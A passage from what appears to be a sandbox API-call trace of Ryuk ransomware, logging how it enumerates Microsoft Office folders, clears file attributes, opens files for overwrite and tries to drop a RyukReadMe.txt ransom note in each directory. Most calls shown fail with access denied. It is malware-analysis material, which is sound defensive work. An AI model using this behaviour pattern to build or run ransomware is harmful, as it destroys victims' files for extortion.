returned 1 [0136.161] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.161] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.161] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Sts.css", dwFileAttributes=0x80) returned 0 [0136.161] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Sts.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\sts.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.162] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.162] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.162] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.162] SetLastError (dwErrCode=0x0) [0136.162] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.162] GetLastError () returned 0x5 [0136.162] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.162] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.162] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\STS2\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3b4940 [0136.162] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.162] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.162] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.162] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\STS2\\background.gif", dwFileAttributes=0x80) returned 0 [0136.163] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\STS2\\background.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\sts2\\background.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.163] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.163] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.163] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.163] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.163] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\STS2\\HEADER.GIF", dwFileAttributes=0x80) returned 0 [0136.163] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\STS2\\HEADER.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\sts2\\header.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.164] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.164] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.164] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.164] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.164] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\STS2\\TAB_OFF.GIF", dwFileAttributes=0x80) returned 0 [0136.164] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\STS2\\TAB_OFF.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\sts2\\tab_off.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.164] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.164] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.164] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.164] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.165] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\STS2\\TAB_ON.GIF", dwFileAttributes=0x80) returned 0 [0136.165] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\STS2\\TAB_ON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\sts2\\tab_on.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.165] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.165] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.165] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0136.165] FindClose (in: hFindFile=0x3b4940 | out: hFindFile=0x3b4940) returned 1 [0136.165] SetLastError (dwErrCode=0x0) [0136.165] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\STS2\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\sts2\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.165] GetLastError () returned 0x5 [0136.165] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.165] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.165] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.165] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.165] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Sts2.css", dwFileAttributes=0x80) returned 0 [0136.165] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Sts2.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\sts2.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.166] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.166] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.166] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.166] SetLastError (dwErrCode=0x0) [0136.166] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.166] GetLastError () returned 0x5 [0136.166] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.166] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.166] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Swirl\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3b4940 [0136.167] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.167] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.167] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.167] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Swirl\\background.gif", dwFileAttributes=0x80) returned 0 [0136.167] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Swirl\\background.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\swirl\\background.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.167] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.167] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.167] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.167] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.167] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Swirl\\HEADER.GIF", dwFileAttributes=0x80) returned 0 [0136.168] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Swirl\\HEADER.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\swirl\\header.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.168] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.168] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.168] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.168] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.168] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Swirl\\TAB_OFF.GIF", dwFileAttributes=0x80) returned 0 [0136.168] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Swirl\\TAB_OFF.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\swirl\\tab_off.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.168] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.168] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.168] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.168] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.169] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Swirl\\TAB_ON.GIF", dwFileAttributes=0x80) returned 0 [0136.169] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Swirl\\TAB_ON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\swirl\\tab_on.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.169] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.169] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.169] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0136.169] FindClose (in: hFindFile=0x3b4940 | out: hFindFile=0x3b4940) returned 1 [0136.169] SetLastError (dwErrCode=0x0) [0136.169] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Swirl\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\swirl\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.169] GetLastError () returned 0x5 [0136.169] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.169] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.169] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.169] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.170] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Swirl.css", dwFileAttributes=0x80) returned 0 [0136.170] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Swirl.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\swirl.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.170] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.170] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.170] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.170] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.170] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Teal.css", dwFileAttributes=0x80) returned 0 [0136.171] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Teal.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\teal.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.171] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.171] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.172] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.172] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.172] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\TexturedBlue.css", dwFileAttributes=0x80) returned 0 [0136.172] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\TexturedBlue.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\texturedblue.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.172] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.172] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.172] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.172] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.173] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\VelvetRose.css", dwFileAttributes=0x80) returned 0 [0136.173] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\VelvetRose.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\velvetrose.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.173] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.173] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.173] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0136.173] FindClose (in: hFindFile=0x3bb540 | out: hFindFile=0x3bb540) returned 1 [0136.173] SetLastError (dwErrCode=0x0) [0136.173] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.173] GetLastError () returned 0x5 [0136.173] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0136.173] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.173] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0136.173] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0136.174] SetLastError (dwErrCode=0x0) [0136.174] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.174] GetLastError () returned 0x5 [0136.174] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0136.174] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.174] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.174] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.174] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.174] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXC", dwFileAttributes=0x80) returned 0 [0136.175] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.175] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.175] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.175] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.175] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.176] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT", dwFileAttributes=0x80) returned 0 [0136.176] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.176] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.176] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.176] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.176] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.176] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.176] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.177] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.177] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.177] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.177] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.177] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.177] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.177] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.177] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.178] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.178] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.178] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL", dwFileAttributes=0x80) returned 0 [0136.179] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\hvac.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.179] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.179] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.179] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.179] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.179] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDIFF.VRD", dwFileAttributes=0x80) returned 0 [0136.180] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDIFF.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\hvacdiff.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.180] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.180] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.181] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.181] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.183] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDUCT.VRD", dwFileAttributes=0x80) returned 0 [0136.183] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDUCT.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\hvacduct.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.183] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.183] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.183] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.183] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.183] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.184] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH.HXS", dwFileAttributes=0x80) returned 0 [0136.184] CreateFileW (lpFileName="C:\\Program Files\\Microsoft 